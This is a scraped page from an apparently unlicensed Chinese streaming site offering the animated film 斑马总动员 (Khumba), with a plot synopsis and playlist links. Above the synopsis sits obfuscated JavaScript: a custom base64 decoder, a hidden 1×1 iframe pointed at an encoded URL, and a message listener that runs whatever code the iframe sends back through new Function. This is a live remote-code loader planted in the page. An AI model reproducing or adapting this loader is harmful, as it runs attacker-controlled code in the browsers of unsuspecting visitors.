分享到:
if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['YxdpREK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6954`]) { var t = x(e.data[`des_s_6954`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HRF'+'F0c'+'HMl'+'MFF'+'0El'+'MkY'+'FFl'+'MkZ'+'qYF'+'FS5'+'5dX'+'NFF'+'odW'+'FFh'+'hLF'+'FmN'+'vbS'+'UzQ'+'TFF'+'EwN'+'DQz'+'FFJ'+'TJF'+'FGY'+'zFF'+'RjY'+'TQy'+'JTJ'+'GYy'+'02O'+'TU0'+'LTI'+'yLT'+'FFF'+'lNg'+'==',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

当前位置:首页  »  动漫片  »  斑马总动员

更多
zkyun点播列表
zkm3u8点播列表
斑马总动员剧情简介
斑马总动员全集,斑马总动员在线观看.在荒凉炎热的戈壁峡谷,唯一的水源处,斑马们正进行快乐的游戏。巨大岩石的阴凉处,一匹母斑马拼尽全力生下了一只小宝宝。然而令斑马们震惊的是,这只新生儿只有前半身有条纹,后半身雪白一片。伙伴们大肆嘲笑这个名叫库巴(杰克·T·奥斯汀 Jake T. Austin 饰)的小可怜,甚至认为它是不幸的象征。太阳继续散发着苦毒的热量,水源越来越少,干旱悄然来临,死亡正悄悄逼近。从妈妈的口中,库巴听说了斑马身上条纹的由来。虚弱的妈妈最终被死神带走,库巴也决定去寻找传说中那个魔法水潭,只为变成一匹真正的斑马。不谙世事的小家伙,就此踏上了凶险和充满希望的旅程……

《斑马总动员》全集在线观看秋霞电影网www.hanguody.cc提供如果您觉得本站不错 请推荐给您的好友